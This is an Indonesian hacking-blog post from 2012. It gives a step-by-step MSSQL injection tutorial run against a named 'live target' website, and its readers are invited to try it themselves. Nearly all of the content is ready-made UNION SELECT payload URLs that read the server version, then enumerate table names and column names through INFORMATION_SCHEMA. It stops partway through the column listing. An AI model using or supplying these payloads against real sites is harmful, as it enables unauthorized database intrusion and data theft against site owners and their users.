Home » Hacking » tutor » Tutor mssql injection with live target [ Devilz cOde ]

Senin, 28 Mei 2012

Tutor mssql injection with live target [ Devilz cOde ]

seperti biasa sama kayak mysql injection kita musti hitung jumlah kolom dalam table nya dulu... ketawa
dah tau kan? gmn cara nya?
setelah nemu jumlah kolom nya, kita chek ukuran bh nya.. eh.. salah... kolom yang urutan brapa aja yang di tampilkan pada perintah select
langsung di coba yah kk', teman teman, om bro, mbak bro...... 
live target nih... ketawa

PHP Code:
http://www.gepe.com/website/index.asp?pageID=163&showProdID=-163+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
tara...
nemu ajaib nya kan?
5 & 7..

lanjut... sekarang kita coba chek version nya..
PHP Code:
http://www.gepe.com/website/index.asp?pageID=163&showProdID=-163+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
v
ya udah deh..
coba check table nya aja...
PHP Code:
http://www.gepe.com/website/index.asp?pageID=163&showProdID=-163+union+select+top+1+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.TABLES-- 

hore kk'... :hero
fika nemu table RefProducts
hehe... makin cantik aja fika... malu

lanjut...
PHP Code:
http://www.gepe.com/website/index.asp?pageID=163&showProdID=-163+union+select+top+1+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('RefProducts')-- 
o iya...

tau ngga napa kita make WHERE+TABLE_NAME+NOT+IN ('nama table sebelum nya')?
ntu karna kita mengambil kolom pake top+1.. dimana dengan perintah tersebut kita akan mendapatkan table nya secara berurutan...

lanjut..
PHP Code:
http://www.gepe.com/website/index.asp?pageID=163&showProdID=-163+union+select+top+1+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('RefProducts','section','Sections')-- 

fika anggap aja kk' kk' n teman teman udah ngerti gmana cara nampilin table nya...
skarang kita akan coba nampilin colomn nya..
PHP Code:
http://www.gepe.com/website/index.asp?pageID=163&showProdID=-163+union+select+top+1+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='RefProducts'-- 

jiha... nemu colum id.. :P
PHP Code:
http://www.gepe.com/website/index.asp?pageID=163&showProdID=-163+union+select+top+1+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='RefProducts'-- 

lanjut...
PHP Code:
http://www.gepe.com/website/index.asp?pageID=163&showProdID=-163+union+select+top+1+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='RefProducts'+AND+COLUMN_NAME+NOT+IN+('ID')-- 

eh...
udahan dulu yah...

Tutor mssql injection with live target [ Devilz cOde ] Rating: 4.5 Diposkan Oleh: r007-

Artikel Terkait Tutor mssql injection with live target [ Devilz cOde ] :

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)